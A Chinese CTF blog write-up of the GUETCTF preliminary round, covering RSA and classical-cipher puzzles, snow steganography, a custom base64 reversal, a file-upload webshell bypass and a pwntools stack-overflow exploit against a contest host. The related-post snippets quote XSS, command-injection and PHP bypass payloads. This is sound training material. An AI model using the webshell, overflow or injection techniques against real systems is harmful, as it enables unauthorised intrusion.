GUETCTF第三届梦极光杯初赛部分WP

最新推荐文章于 2023-04-23 13:57:09 发布
最新推荐文章于 2023-04-23 13:57:09 发布
阅读量301 收藏
点赞数
文章标签: 安全 web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/128491899
版权
这篇博客探讨了一系列网络安全和逆向工程问题,包括Web安全中的文件上传漏洞利用、非预期解密方法、RSA加密的解密过程以及异常Base64编码的解析。通过解决这些挑战,展示了对加密算法、栈溢出漏洞和Base64编码的理解和应用。
摘要由CSDN通过智能技术生成

Web

Upload

文件上传,查看源码发现白名单是png,jpg和gif

写一个一句话木马

提交后用bp把文件后缀名改为php

然后就用蚁剑连接

在根目录下发现flag

Crypto

大学生张三

 

解压后是一个图片

是希腊字母

对照希腊字母大小写解出flag:GUeTctf{LaTeX iS goOD}

不过出题方好像是要我们找到他们的发音什么的,这是非预期

柯南道尔的手稿

 前一半flag是替换密码,用qiuqiu解密

得到一半的flag:guetctf{m0no@1ph@betic_cipher_@nd_

翻译文章得到了key:fuermosi

 用维吉尼亚密码解密得到后半flag:v19enere}

 

初中生张三

下载得到两个文件

output.txt:

n = 14998544546118048751019431798420317023513867039909900667539090644907799607996694305477717018412814449315734959892105547903664694318938627795989848923279858864657261920441046071546599828892800165919419163722272763471528966933521270021271032841128002046813776630810447335258252223059548967793232680929579490759338686340748881816419455244534040631473789009700628519453443051602228960172027560798010578163816609879272793648438019162990654418331739655246830933124359980893533311832738385124690021939400608344686466159239906594501146756572725216163176976837852951340585197433738815161392095711859551139354910787737443884763
c = 1263014643271828791081358366669403898447454851208347561512246477851408666843208050245458152778124310505189513567872819708791547863089082767253757131001707518256312495606427123589832591627231688943204662572575241318938047941518182988607061989807574408054238640752802115705845564311653669247957995938859980828570210961433027399868524711955684373328635446247408141474992333902524001031782554172313282626838376550519155921355185602240197543928083853896229211455517676258423202525755267816713849251699983306886706605697363714399487853808488091542082793626359758162042432111708456927378967869087487928750517180888720806611
gift = 14998544546118048751019431798420317023513867039909900667539090644907799607996694305477717018412814449315734959892105547903664694318938627795989848923279858864657261920441046071546599828892800165919419163722272763471528966933521270021271032841128002046813776630810447335258252223059548967793232680929579487436630315165023708642270933734182788884753935630472347474207436398366750124020713041945559582979845489974546171220269274785420798932077498634255551078266569814537282069392884251498459424382395431598314059145440756188749451813602760399832987773292896793499527246728557019917385596236288618589252285262735677647360

 challenge:

from Crypto.Util.number import *
from GUETCTF import flag

p = getPrime(1024)
q = getPrime(1024)
n = p * q
e = 0x10001
m = bytes_to_long(flag)
c = pow(m, e, n)
gift = (p+e)*(q-e)

output = open('output.txt', 'w')
output.write('n = ' + str(n) + '\n')
output.write('c = ' + str(c) + '\n')
output.write('gift = ' + str(gift) + '\n')

利用gift与n算p,q

sage:

n = 14998544546118048751019431798420317023513867039909900667539090644907799607996694305477717018412814449315734959892105547903664694318938627795989848923279858864657261920441046071546599828892800165919419163722272763471528966933521270021271032841128002046813776630810447335258252223059548967793232680929579490759338686340748881816419455244534040631473789009700628519453443051602228960172027560798010578163816609879272793648438019162990654418331739655246830933124359980893533311832738385124690021939400608344686466159239906594501146756572725216163176976837852951340585197433738815161392095711859551139354910787737443884763
c = 1263014643271828791081358366669403898447454851208347561512246477851408666843208050245458152778124310505189513567872819708791547863089082767253757131001707518256312495606427123589832591627231688943204662572575241318938047941518182988607061989807574408054238640752802115705845564311653669247957995938859980828570210961433027399868524711955684373328635446247408141474992333902524001031782554172313282626838376550519155921355185602240197543928083853896229211455517676258423202525755267816713849251699983306886706605697363714399487853808488091542082793626359758162042432111708456927378967869087487928750517180888720806611
gift = 14998544546118048751019431798420317023513867039909900667539090644907799607996694305477717018412814449315734959892105547903664694318938627795989848923279858864657261920441046071546599828892800165919419163722272763471528966933521270021271032841128002046813776630810447335258252223059548967793232680929579487436630315165023708642270933734182788884753935630472347474207436398366750124020713041945559582979845489974546171220269274785420798932077498634255551078266569814537282069392884251498459424382395431598314059145440756188749451813602760399832987773292896793499527246728557019917385596236288618589252285262735677647360
e = 0x10001
var('p q')
solve([(p+e)*(q-e)==gift,p * q==n],[p,q])

 得到

[p == 150414490626131999840290275061353186166370322157486732633324629991276538677683227821774756078749332578169204118089196270868895587269842124291802615666317942002482915541149325838526414071563893000512999418976026095744564441490868843345059661074084081258480389396836118352516862360718545807908937715376916455003, q == 99714758090682937887894704292011421182518149287516665632313811573386865991473127961865812260826877001626110497349336821330809165012395884137065729939860249551404040230371599452917884071753755136760518035833468469511966799014970191212427252065378388960117005995845758986124686849183450046239192340618764609921]

解密脚本

import gmpy2
from Crypto.Util.number import *
def Decrypt(c,e,p,q):
    L=(p-1)*(q-1)
    d = gmpy2.invert(e,L)
    n=p*q
    m=gmpy2.powmod(c,d,n)
    flag=str(m)
    return flag
p =150414490626131999840290275061353186166370322157486732633324629991276538677683227821774756078749332578169204118089196270868895587269842124291802615666317942002482915541149325838526414071563893000512999418976026095744564441490868843345059661074084081258480389396836118352516862360718545807908937715376916455003
n =14998544546118048751019431798420317023513867039909900667539090644907799607996694305477717018412814449315734959892105547903664694318938627795989848923279858864657261920441046071546599828892800165919419163722272763471528966933521270021271032841128002046813776630810447335258252223059548967793232680929579490759338686340748881816419455244534040631473789009700628519453443051602228960172027560798010578163816609879272793648438019162990654418331739655246830933124359980893533311832738385124690021939400608344686466159239906594501146756572725216163176976837852951340585197433738815161392095711859551139354910787737443884763
q = n//p
e = 0x10001
c =1263014643271828791081358366669403898447454851208347561512246477851408666843208050245458152778124310505189513567872819708791547863089082767253757131001707518256312495606427123589832591627231688943204662572575241318938047941518182988607061989807574408054238640752802115705845564311653669247957995938859980828570210961433027399868524711955684373328635446247408141474992333902524001031782554172313282626838376550519155921355185602240197543928083853896229211455517676258423202525755267816713849251699983306886706605697363714399487853808488091542082793626359758162042432111708456927378967869087487928750517180888720806611

print (Decrypt(c,e,p,q))
print(long_to_bytes(int(Decrypt(c,e,p,q)))) #long_to_bytes正整数转化为byte类型字符串

 

 

GUETCTF{One_E2_equ@ti0n5}

 MICS

 冬天到了

解压后得到一个图片,下部分有个红色的竖线,猜想是长不够,修改长发现

Password:snow_snow_snow

把图片拉入010editor,发现有flag.txt和压缩包的开头,用foremost分离压缩包

 压缩包里面的flag.txt 

使用snow.exe解密,密码:snow_snow_snow

得到flag:GUETCTF{Th3_sn0w_1s_b3aut1ful}

PWN

pwn1

直接用nc连接,cat flag

 pwn2

 

使用 checksec 检查保护以及位数。

 可以看到题目是 64 位的,只开了 NX 保护。接着将 pwn2 文件放入 ida64 中进行反编译。

进入 ida 后使用 F5 加载伪代码。

分析main函数

通过观察可以发现,定义了两个数组一个是 v4,一个是 buf 大小都是 32。 接着观察主体函数逻辑,首先有三个 puts 函数进行打印文本,接着出现一个 read 函数。

对该 read 函数进行分析。 read函数读取我们所输入的内容将其存在buf数组中,但是定义了只能接受0xA大小的数据明显无法构造我们所需要的 ROP 链,这里不存在漏洞。 分析下一个 read 函数,可以看到该 read 函数可以接受 0x80 大小的数据。

点击buf发现

可以看到 ret 返回地址处在 0x40+0x8 的地方,但是我们可以输入 0x80 大小的数据。此处存在栈溢出漏洞。

接着在 ida 中找到了 getshell 函数

点击bin

 那么 system 函数的位置就在 0x40067A 的位置上了。 那就直接编写 exp 就好了 exp 如下:

from pwn import*
context.log_level = 'debug'
p = remote('172.16.64.96',9199)
system_addr = 0x40067A
p.recvuntil('Please input your name.')
p.sendline(b'aaaa')
p.recvuntil('Please input your password.')
payload = b'a'*(0x48) + p64(system_addr)
p.sendline(payload)
p.interactive()

flag:

GUETCTF{c719652a-baf2-4875-ad9a-4be0047cf706}

RESVER 

Re3

题目描述:

 

 已经给了提示是异常的 base64 了

先运行看看

 

 丢 exeinfo,无壳,64 位

 

丢 ida,找到主函数反汇编

跟进 base64_encode 加密函数

大概就是 flag 经过不一样的 Base64 加密后得到的字符串和 v4 进行比较,相等则
成功
查看 v4 字符串,这里是小端序,字符串从右往左看

所以 v4 为 F1JTJSBIFntXL0wwdmJfF3IzdV0=
猜测是对正常的 base64 加密的字符串进行替换,用 x64dbg 来看
想到比赛说 flag 都是由 GUETCTF{}包裹,试试运气看看 GUETCTF,丢进 x64dbg

证明猜想是正确的,且可以知道异常 base64 加密就是对正常 base64 加密的大写
字母进行了替换,其余的均不变
主要的替换规则如下 

手动换字母得到 R1VFVENURntJX0wwdmVfR3UzdH0= 

提交确实是 flag 

墨言ink
关注
NEWSCTF第一届--官方wp2021新春赛)
qq_55400494的博客
06-02 4553
目源码及部分wp汇总如下 链接:https://pan.baidu.com/s/1RIatd5BdmHgckwZ4w_Gcog 提取码:news Web
第一届东软网络CTF竞赛-DNUICTF部分wp
weixin_52829570的博客
12-06 3619
MISC [签到]签到 直接提交flag即可 flag:flag{Dnui_ctf_2021_s1gn_in} [萌新]在哪呢 ctrl+a全选发现有个空白的地方被选中了 在kali打开选中,拿到flag flag:flag{hey_there_is_no_thing} 只是个PNG,别想太多了.png binwalk命令查看png图片:binwalk -e PNG.png,发现flag flag:flag{zhe_ti_mu_ye_tai_bt_le_XD}
NewStarCTF 公开赛wp
FUCKING12的博客
10-16 1588
新生赛wp
CTF练习WP(Week 1)
qq_61632010的博客
03-26 493
1.robots(web) 2.view_source 3.cookie 4.simple_php
2022西湖论剑-初赛CTF部分wp-Zodiac
toto的博客
02-03 3492
2023西湖论剑初赛CTF部分wp
[CTF]GUET极光线上赛个人WP
Sapphire037的博客
11-15 5309
Misc 1.相信光 gif分离,有两张有二维码,随便扫了一张就出了 2.简简单单 压缩包,解压,再解压,有密码,爆破得到7788,查看文件头,png文件,改格式,一张二维码,扫描即可 3.real_checkin 拖进010 一串base,直接拖进cyberchef一把梭即可,base32解码得到flag 这个二维码不太行 盲猜补定位符,但是图片很短,010里改高度补齐定位符然后扫码即可 miscmisc 图片叫做password,右键属性就看到密码,然后解开压缩包,1.txt是社会主义核心价值观编码
[CTF]GUET极光线下赛web部分WP
Sapphire037的博客
11-21 1244
Cover with trick 双写绕过,变量覆盖 Construct Master "%07%15%05%14%03%14%06"|"%60%60%60%60%60%60%60" import urllib from sys import * import os def action(arg): s1 = "" s2 = "" for i in arg: f = open("rce.txt", "r") while True: t = f.readline() if t
第三届“中科实数”团队赛wp
Hilllle的博客
04-09 7382
有嫌疑人在使用Windows系统,取证人员对该系统进行了硬盘镜像。通过自己的工具软件对档案袋中的镜像文件进行提取、分析、逆向、恢复、破解、查找等,在线完成填空、简答和司法鉴定意见书。
2022届毕业生“极光”线上综合测试I数学试及答案.pdf
07-25
由于提供的文件内容片段包含大量的数学问及其答案,而没有对问的详细解析,我将尝试针对部分内容进行知识点的提取和说明。 1. 数列与函数周期性: 在选择中提到了“函数的最小正周期”,这意味着函数具有...
第一届桂林电子科技大学绿盟CTF大赛 wp
Xi4or0uji
05-21 2969
misc音频分析拿到一个wav文件,用audacity打开看见很明显是摩斯电码..-. .-.. .- --. .. ... -- --- .-. ... . -.... -.... -.... --. ..- . - --.- .-- 解密就出来了数据包分析分析数据包看见发了个flag.jpg,提出来看一下是真的皮呀..........丢去010看见是个压缩包,里面还有个flag.txt!!激动...
电子科大CTF安全萌新赛部分WP
Arcadios的博客
03-31 3268
只做了WEB和MISC的一部分,下面是wp WEBXSS1F12一下看到这是在input标签里XSS,所以先用”>闭合value就行了,我写的是"><script>alert(document.domain)</script> 灵的钱罐 目里说十万元可以干任何事,于是postmoney=100000 拿到flag:cnss{G00d_1uck_Hav3_Fun}Nothing Here 这
buuctf-web-[ACTF2020 新生赛]Exec-wp
居上
06-25 196
[ACTF2020 新生赛]Exec 知识点 命令执行 过程 主页面: 这里是存在命令执行漏洞的,我们尝试去使用;执行命令 127.0.0.1;cat /flag
CTF攻防世界--webwp
weixin_43803070的博客
05-18 8411
Linux的系统光盘,当然想到了在Linux下进行挂载了。 打开虚拟机: root@kali:~# strings '/root/桌面/linux' | grep flag //strings - 显示文件中的可打印字符 strings 一般用来查看非文本文件的内容. root@kali:~# sudo mount '/root/桌面/linux' /mnt //将文件挂载到/...
[ACTF2020 新生赛]Include 1 -WP
m0_52314120的博客
03-10 3644
签到 文件包含,
2021全国大学生信息安全竞赛初赛部分WP
weixin_45844670的博客
05-17 4076
第一阶段 Misc tiny traffic 分析pcap包,能发现几个可疑的请求——/flag_wrapper、/test、/secret,分别把它们传输的文件提取出来,得到三个压缩包,通过flag.gzip的内容可以确认这个IP就是我们要分析的IP 再使用Peazip分别提取secret和test的压缩包,能发现传输的格式规范 syntax = "proto3"; message PBResponse { int32 code = 1; int64 flag_part_convert_to_h
“百度”CTF比赛 2017 二月场 wp
qq_61768489的博客
04-04 1512
目录 爆破-1 爆破-2 爆破-3 include Zone OneThink misc 2 上古神器 爆破-1 flag在一个长度为6的变量里面 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> $$a ,.
XSCTF联合招新赛-热身赛(部分WP)
SwBack的博客
10-22 1819
由于没有多少时间答,抽空在划水的时候做了一两道目.比赛已经结束了24小时了。特把写的WP分享一下,欢迎各位大佬进行指点。
ctf wp 汇总
freshfox的博客
07-06 1156
ctf
CTFShow-Web篇详细wp(持续更新中ing)
最新发布
Aluxian_的博客
04-23 1280
【代码】CTFShow-Web篇详细wp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值